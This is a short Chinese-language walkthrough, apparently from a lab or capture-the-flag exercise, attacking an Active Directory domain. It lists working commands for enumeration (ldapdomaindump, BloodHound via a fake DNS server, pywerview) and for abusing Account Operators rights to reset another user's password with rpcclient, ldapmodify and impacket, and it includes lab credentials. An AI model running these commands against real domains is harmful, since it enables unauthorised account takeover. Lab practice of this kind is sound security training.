1.LLMNR

链路本地多播名称解析( LLMNR ) 是一种基于域名系统(DNS) 数据包格式的协议，允许IPv4和IPv6主机对同一本地链路上的主机执行名称解析。

2.ad域用户/组信息收集

ldapdomaindump 使用ldap协议收集域信息

ldapdomaindump soupedecode.local -u ‘soupedecode.local\zximena448’ -p ‘internet’

获得 domain_users.html \domain_group.html \domain_computer.html

bloodhound

使用时，提示错误，dns服务器不存在

使用假的 dns 服务器https://github.com/iphelix/dnschef

sudo python3 /opt/dnschef/dnschef.py –fakeip 192.168.130.25

bloodhound-python -c All -u XKATE578 -p jesuschrist -d SOUPEDECODE.LOCAL -ns 127.0.0.1 -dc dc01

sudo neo4j start

sudo bloodhound

pywerview.py

python pywerview.py get-netuser -w soupedecode -u xkate578 -p jesuschrist -t 192.168.130.25 –username xkate578

3.Account Operators组 和修改密码

Account Operators 是系统内置组 具有修改普通账户的密码 和增加一个新用户的权限

修改密码的方法 ：

rpcclient

rpcclient -U ‘XKATE578%jesuschrist’ 192.168.130.25

lookupnames fbeth103

setuserinfo2 fbeth103 23 ‘P@ssw0rd’

ldapmodify：

dn: CN=Fanny Beth,CN=Users,DC=soupedecode,DC=local
changetype: modify
replace: unicodePwd
unicodePwd:: IgBOAGUAdwBQAGEAcwBzAHcAbwByAGQAIwA1ADIAMgA0AA==

ldapmodify -x -D “CN=Xenia Kate,CN=Users,DC=SOUPEDECODE,DC=LOCAL” -w “xxxxx” -H ldap://192.168.130.25 -f reset_password.ldif

impacket-changepasswd

impacket-changepasswd ‘soupedecode.local/fbeth103’@192.168.130.25 -altuser xkate578 -altpass “jesuschrist” -newpass fbeth103 -no-pass -reset

我重置密码失败了